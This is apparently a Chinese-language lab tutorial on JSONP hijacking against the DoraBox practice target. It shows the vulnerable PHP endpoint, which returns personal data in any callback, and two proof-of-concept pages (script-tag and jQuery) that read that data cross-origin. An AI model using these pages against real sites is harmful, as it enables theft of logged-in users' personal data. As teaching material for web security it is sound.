JSONP跨域:
由于script标签不受浏览器同源策略影响,可以跨域引用资源,
所以可以动态构造<script>标签,来进行跨域请求。请求回来的数据
会通过一个指定的回调函数传回来
JSONP漏洞:
靶机代码
<?php include "../class/function.class.php"; $reqMethod = "GET"; $reqValue = "callback"; $p = new Func($reqMethod, $reqValue); $info = array('username' => 'Vulkey_Chen', 'mobilephone' => '13188888888', 'email' => '[email protected]', 'address' => '中华人民共和国', 'sex' => 'Cool Man'); if(!@$_GET['callback']){ echo $p -> con_function('json_encode',$info); }else{ $callback = htmlspecialchars($_GET['callback']); echo "{$callback}(" . $p -> con_function('json_encode',$info) . ")"; } ?>
代码后面,判断了是否有callback参数,如果输出json格式的信息,
如果有,做一次实体编码转换,然后在输出json格式的信息。
利用代码:
1 <!DOCTYPE html> 2 <html lang="en"> 3 <head> 4 <meta charset="UTF-8"> 5 <title>jsonp</title> 6 7 </head> 8 <body> 9 <script type="text/javascript"> 10 function test(data) { 11 alert(data.username); 12 } 13 var body = document.getElementsByTagName('body')[0]; 14 var script = document.createElement('script'); 15 script.src = 'http://192.168.160.1/DoraBox-master/csrf/jsonp.php?callback=test'; 16 body.appendChild(script); 17 18 </script> 19 </body> 20 </html>
通过动态生成<script>来请求
使用jquery的$.getJSON()来进行请求
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>JSONPJQUERY</title> <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script> </head> <body> <script> $.getJSON("http://192.168.160.1/DoraBox-master/csrf/jsonp.php?callback=?",function (data) { alert(data.username) }) </script> </body> </html>
